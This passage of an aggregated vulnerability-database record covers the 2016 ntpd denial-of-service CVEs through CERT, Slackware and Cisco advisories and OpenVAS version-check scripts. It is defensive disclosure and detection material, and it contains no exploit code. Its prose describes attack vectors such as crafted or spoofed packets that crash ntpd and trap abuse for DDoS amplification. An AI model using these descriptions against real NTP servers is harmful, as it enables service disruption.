Vector \n---|---|--- \nBase | 7.8 | AV:N/AC:L/Au:N/C:N/I:N/A:C \nTemporal | 6.1 | E:POC/RL:OF/RC:C \nEnvironmental | 6.1 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se>\n * [nwtime.org/ntp428p9_release](<nwtime.org/ntp428p9_release>)\n\n### Acknowledgements\n\nNTP.org thanks Matthew Van Gundy of Cisco, Robert Pajak, Sharon Goldberg and Aanchal Malhotra of Boston University, Magnus Stubman, Miroslav Lichvar of Red Hat, and Brian Utterback of Oracle for reporting these vulnerabilities.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-7426](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7426>), [CVE-2016-7427](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7427>), [CVE-2016-7428](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7428>), [CVE-2016-7429](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7429>), [CVE-2016-7431](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7431>), [CVE-2016-7433](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7433>), [CVE-2016-7434](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7434>), [CVE-2016-9310](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-9310>), [CVE-2016-9312](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-9312>) \n---|--- \n**Date Public:** | 2016-11-21 \n**Date First Published:** | 2016-11-21 \n**Date Last Updated: ** | 2017-11-20 15:38 UTC \n**Document Revision: ** | 26 \n", "modified": "2017-11-20T15:38:00", "published": "2016-11-21T00:00:00", "id": "VU:633847", "href": "https://www.kb.cert.org/vuls/id/633847", "type": "cert", "title": "NTP.org ntpd contains multiple denial of service vulnerabilities", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311", "CVE-2016-9312"], "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/ntp-4.2.8p9-i586-1_slack14.2.txz: Upgraded.\n In addition to bug fixes and enhancements, this release fixes the\n following 1 high- (Windows only :-), 2 medium-, 2 medium-/low, and\n 5 low-severity vulnerabilities, and provides 28 other non-security\n fixes and improvements.\n CVE-2016-9311: Trap crash\n CVE-2016-9310: Mode 6 unauthenticated trap info disclosure and DDoS vector\n CVE-2016-7427: Broadcast Mode Replay Prevention DoS\n CVE-2016-7428: Broadcast Mode Poll Interval Enforcement DoS\n CVE-2016-9312: Windows: ntpd DoS by oversized UDP packet\n CVE-2016-7431: Regression: 010-origin: Zero Origin Timestamp Bypass\n CVE-2016-7434: Null pointer dereference in _IO_str_init_static_internal()\n CVE-2016-7429: Interface selection attack\n CVE-2016-7426: Client rate limiting and server responses\n CVE-2016-7433: Reboot sync calculation problem\n For more information, see:\n https://www.kb.cert.org/vuls/id/633847\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9311\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9310\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7427\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7428\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9312\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7431\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7434\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7429\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7426\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7433\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p9-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p9-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p9-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p9-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p9-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p9-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p9-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p9-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p9-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p9-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p9-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p9-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p9-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p9-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\nde30f660b0bdcf5d395d58fe95baebaf ntp-4.2.8p9-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\ncf19e17e609553bdac6bed7a5463a652 ntp-4.2.8p9-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\n366967036495ace2e4ee27c28737fb39 ntp-4.2.8p9-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n70535cbef8c11188ad965c8c6890c7a5 ntp-4.2.8p9-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\nea3caede15d6879d83e9727bb706eb4b ntp-4.2.8p9-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n08921ff8cf9f68539e12d586765adb5b ntp-4.2.8p9-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nc787e7e9c2b813af7d1d1260a5572f71 ntp-4.2.8p9-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\nd2b1608fc009dac1c68dc710004f26f3 ntp-4.2.8p9-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n4329419d697ce523da2bf24c060c650f ntp-4.2.8p9-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nacdb54929957393f6957c28716867bbf ntp-4.2.8p9-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\n1118e86610a5ceea6f86901e4306dc1a ntp-4.2.8p9-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n9a6db91e52972e7e6ea902acefef1198 ntp-4.2.8p9-x86_64-1_slack14.2.txz\n\nSlackware -current package:\nb098a4bafbb0d07ace6e976624d54a7a n/ntp-4.2.8p9-i586-1.txz\n\nSlackware x86_64 -current package:\n2a08f8963d13804c467cec22603d69e4 n/ntp-4.2.8p9-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.8p9-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "modified": "2016-11-21T19:25:10", "published": "2016-11-21T19:25:10", "id": "SSA-2016-326-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.641761", "type": "slackware", "title": "[slackware-security] ntp", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "cisco": [{"lastseen": "2020-12-24T11:41:14", "bulletinFamily": "software", "cvelist": ["CVE-2015-8138", "CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311", "CVE-2016-9312"], "description": "A vulnerability in Network Time Protocol (NTP) could allow an unauthenticated, remote attacker to modify the system clock on a targeted system.\n\nThe vulnerability is due to insufficient checks of user-supplied data by the affected software. An attacker could exploit this vulnerability by sending a crafted packet to a targeted NTP client. A successful exploit could disable server synchronization, resulting in the ability to modify the system clock on the targeted client system.\n\nA vulnerability in the Network Time Protocol (NTP) service could allow a local attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper initial sync calculations that are performed by the affected software. The vulnerability was introduced as the result of an attempt to fix NTP Bug 2085, involving a condition where the root delay was included twice, causing a higher than expected jitter value. Because of a misinterpretation of a small-print variable, a root distance would not include the peer dispersion. An attacker could exploit this vulnerability to cause a partial DoS condition on an affected system.\n\nA vulnerability in the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper handling of crafted packets by the affected software when the trap service is enabled. An attacker could exploit this vulnerability by sending crafted packets to a targeted system. An exploit could cause a NULL pointer dereference that could cause the ntpd service to crash, resulting in a DoS condition.\n\nA vulnerability in the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to insufficient resource pooling when rate limiting for all associations is configured within the affected software. An attacker could exploit this vulnerability by sending crafted packets with a spoofed source address to the targeted system. An exploit could prevent the affected software from accepting valid responses from its configured sources, resulting in a DoS condition.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow a local attacker to cause a denial of service (DoS) condition on a targeted system.\n\nThe vulnerability is due to improper validation of user-supplied data by the affected software. An attacker could exploit the vulnerability by sending a malicious packet to a targeted system. A successful exploit could cause the ntpd to stop functioning, resulting in a DoS condition.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on a targeted system.\n\nThe vulnerability is due to improper validation of user-supplied data by the affected software. An unauthenticated, remote attacker could exploit the vulnerability by sending a malicious packet to a targeted system. A successful exploit could cause the ntpd to stop functioning, resulting in a DoS condition.\n\nA vulnerability in the broadcast-mode, poll-interval enforcement functionality of the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper resource management by the affected software. An attacker who has access to the broadcast domain of a targeted system could exploit this vulnerability by injecting crafted, broadcast-mode NTP packets into the broadcast domain in which the targeted system resides. A successful exploit could cause the NTP daemon to reject broadcast-mode packets from legitimate broadcast servers, resulting in a DoS condition.\n\nA vulnerability in the broadcast-mode, replay prevention functionality of the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper resource management by the affected software. An attacker who has access to the broadcast domain of a targeted system could exploit this vulnerability by injecting crafted, broadcast-mode NTP packets into the broadcast domain in which the targeted system resides. A successful exploit could cause the NTP daemon to reject broadcast-mode packets from legitimate broadcast servers, resulting in a DoS condition.\n\nA vulnerability in the control mode (mode 6) functionality of the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper security restrictions that could lead to configuration modification. If the restrict default noquery best current practices recommendation for NTP is not specified, an attacker could exploit this vulnerability by sending a crafted control mode packet to an affected system. An exploit could allow the attacker to modify the affected software. The attacker could set ntpd traps, which could be leveraged to disclose sensitive information or aid in DDoS amplification. In addition, an attacker could unset ntpd traps, which could disable monitoring, resulting in a DoS condition.\n\nMultiple Cisco products incorporate a version of the Network Time Protocol daemon (ntpd) package. Versions of this package are affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or modify the time being advertised by a device acting as a Network Time Protocol (NTP) server.\n\nOn November 21, 2016, the NTP Consortium of the Network Time Foundation released a security notice that details ten issues regarding DoS vulnerabilities and logic issues that may allow an attacker to shift a system's time.\n\nThe new vulnerabilities disclosed in this document are as follows:\n\nNetwork Time Protocol Trap Service Denial of Service Vulnerability\nNetwork Time Protocol Broadcast Mode Denial of Service Vulnerability\nNetwork Time Protocol Broadcast Mode Denial of Service Vulnerability\nNetwork Time Protocol Insufficient Resource Pool Denial of Service Vulnerability\nNetwork Time Protocol Configuration Modification Denial of Service Vulnerability\nNetwork Time Protocol mrulist Query Requests Denial of Service Vulnerability\nNetwork Time Protocol Multiple Binds to the Same Port Vulnerability\nNetwork Time Protocol Rate Limiting Denial of Service Vulnerability\n\nAs well as:\n\nRegression of CVE-2015-8138\nNetwork Time Protocol Reboot sync calculation problem\n Additional details about each vulnerability are in the NTP Consortium Security Notice [\"http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se\"].\n\nWorkarounds that address one or more of these vulnerabilities may be available and are documented in the Cisco bug for each affected product.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161123-ntpd [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161123-ntpd\"]", "modified": "2017-01-23T14:51:48", "published": "2016-11-23T16:00:00", "id": "CISCO-SA-20161123-NTPD", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161123-ntpd", "type": "cisco", "title": "Multiple Vulnerabilities in Network Time Protocol Daemon Affecting Cisco Products: November 2016", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2020-01-27T18:37:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171023", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2017-1023)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1023\");\n script_version(\"2020-01-23T10:44:21+0000\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:44:21 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:44:21 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2017-1023)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1023\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1023\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2017-1023 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that when ntp is configured with rate limiting for all associations the limits are also applied to responses received from its configured sources. A remote attacker who knows the sources can cause a denial of service by preventing ntpd from accepting valid responses from its sources. (CVE-2016-7426)\n\nA flaw was found in the control mode functionality of ntpd. A remote attacker could send a crafted control mode packet which could lead to information disclosure or result in DDoS amplification attacks. (CVE-2016-9310)\n\n A flaw was found in the way ntpd implemented the trap service. A remote attacker could send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. (CVE-2016-9311)\n\nA flaw was found in the way ntpd running on a host with multiple network interfaces handled certain server responses. A remote attacker could use this flaw which would cause ntpd to not synchronize with the source. (CVE-2016-7429)\n\nA flaw was found in the way ntpd calculated the root delay. A remote attacker could send a specially-crafted spoofed packet to cause denial of service or in some special cases even crash. (CVE-2016-7433)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.0.1.h1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.0.1.h1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-08T00:00:00", "id": "OPENVAS:1361412562310872101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872101", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2016-7209ab4e02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ntp FEDORA-2016-7209ab4e02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872101\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 09:37:06 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-7433\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2016-7209ab4e02\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-7209ab4e02\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U5E3XBBCK5IXOLDAH2E4M3QKIYIHUMMP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~43.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-02-07T00:00:00", "id": "OPENVAS:1361412562310871756", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871756", "type": "openvas", "title": "RedHat Update for ntp RHSA-2017:0252-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ntp RHSA-2017:0252-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871756\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-07 05:44:27 +0100 (Tue, 07 Feb 2017)\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\",\n \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for ntp RHSA-2017:0252-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Network Time Protocol (NTP) is used\nto synchronize a computer's time with another referenced time source. These\npackages include the ntpd service which continuously adjusts system time and\nutilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n * It was found that when ntp is configured with rate limiting for all\nassociations the limits are also applied to responses received from its\nconfigured sources. A remote attacker who knows the sources can cause a\ndenial of service by preventing ntpd from accepting valid responses from\nits sources. (CVE-2016-7426)\n\n * A flaw was found in the control mode functionality of ntpd. A remote\nattacker could send a crafted control mode packet which could lead to\ninformation disclosure or result in DDoS amplification attacks.\n(CVE-2016-9310)\n\n * A flaw was found in the way ntpd implemented the trap service. A remote\nattacker could send a specially crafted packet to cause a null pointer\ndereference that will crash ntpd, resulting in a denial of service.\n(CVE-2016-9311)\n\n * A flaw was found in the way ntpd running on a host with multiple network\ninterfaces handled certain server responses. A remote attacker could use\nthis flaw which would cause ntpd to not synchronize with the source.\n(CVE-2016-7429)\n\n * A flaw was found in the way ntpd calculated the root delay. A remote\nattacker could send a specially-crafted spoofed packet to cause denial of\nservice or in some special cases even crash. (CVE-2016-7433)\");\n script_tag(name:\"affected\", value:\"ntp on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0252-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-February/msg00011.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.6p5~25.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~10.el6_8.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.6p5~10.el6_8.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~10.el6_8.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "Check the version of ntp", "modified": "2019-03-08T00:00:00", "published": "2017-02-07T00:00:00", "id": "OPENVAS:1361412562310882654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882654", "type": "openvas", "title": "CentOS Update for ntp CESA-2017:0252 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ntp CESA-2017:0252 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# 